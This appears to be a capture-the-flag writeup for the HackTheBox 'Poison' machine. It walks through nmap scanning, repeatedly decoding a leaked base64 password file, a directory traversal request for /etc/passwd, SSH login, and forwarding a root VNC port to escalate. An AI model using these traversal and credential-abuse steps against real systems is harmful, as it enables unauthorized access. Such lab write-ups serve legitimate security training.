1/31/2024
Explore the step-by-step process of hacking into the Poison machine on HackTheBox, a renowned platform for honing cybersecurity skills through hands-on challenges. This detailed writeup provides insights into the techniques, tools, and methodologies used to root the box.
I started this box because it was made with a Medium difficulty tag and it was running FreeBSD. But after finishing the machine, I think it should have been marked as an easy machine.
The box requires some knowledge of VNC and X Window Authorization. However, it is relatively simple otherwise.
The IP of the machine is 10.10.10.84
nmap -sC -sV -oA nmap/Poison 10.10.10.84
We see that port 22 and port 80 are open.
Typing listfiles.php returns:
Array ( [0] => . [1] => .. [2] => browse.php [3] => index.php [4] => info.php [5] => ini.php [6] => listfiles.php [7] => phpinfo.php [8] => pwdbackup.txt )
Let's try to access this file. By putting this filename in the Scriptname section.
This is base64 and it looks like it has been encoded 13 times. Quick bash script to decode this. We run a for loop 13 times and decode it.
#!/bin/bash file="passwd.txt" temp_file=$(mktemp) # There are spaces in the file that shouldn't be there. sed 's/ //g' "$file" > "$temp_file" mv "$temp_file" "$file" for (( i=1; i<=13; i++ )) do base64 -d "$file" > "$file.tmp" && mv "$file.tmp" "$file" done cat $file
We get the password Charix!2#4%6&8(0, We don't know what this is used for and don't have any username to try the SSH.
So let us try a directory traversal attack to see if we can get the /etc/passwd file.
http:/browse.php?file=../../../../../../../../../../../../etc/passwd
The username is charix.
Now that we have the credentials, we can try to log in to ssh.
We get secret.zip which is an encrypted file. Unfortunately, I cannot type any password in the ssh connection so I will move the file out using scp.
scp [email protected]:/home/charix/secret.zip secret.zip
Decrypting it gives us a binary file secret. Right now we do not have a use for this file. So, back to enumeration.
charix@Poison:~ % ps -auwwx USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND . . . root 529 0.0 0.9 23620 8868 v0- I 00:48 0:00.03 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1 . . . charix 922 0.0 0.3 21208 2652 1 R+ 02:59 0:00.00 ps -auwwx
We see a vnc session that runs with root privileges on port 5901. We have the secret binary and that could used for cookie-based authentication.
For us to try it we need access to the vnc port (no point connecting to vnc in ssh). This is a worthy shot, try for the lowest hanging fruits first.
ssh -L5901:127.0.0.1:5901 [email protected]
Now we can access the port on localhost:5901.
vncviewer 127.0.0.1:5901 -passwd secret